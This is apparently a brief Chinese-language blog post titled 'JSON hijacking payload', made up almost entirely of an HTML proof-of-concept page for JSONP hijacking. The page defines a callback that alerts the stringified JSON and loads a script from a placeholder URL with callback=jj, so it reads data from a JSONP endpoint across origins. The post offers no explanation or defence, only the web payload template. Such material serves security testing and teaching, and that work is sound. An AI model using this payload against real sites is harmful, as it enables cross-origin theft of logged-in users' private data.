json劫持payload 

<html>
<head>jsonp hijacking</head>
<body>
<script>
    function jj(json){
        alert(JSON.stringify(json));
    }
</script>
<script src="https://test/?callback=jj">
</script>
</body>
</html>

 

posted @ 2019-03-26 17:16  huim  阅读(540)  评论(0)    收藏  举报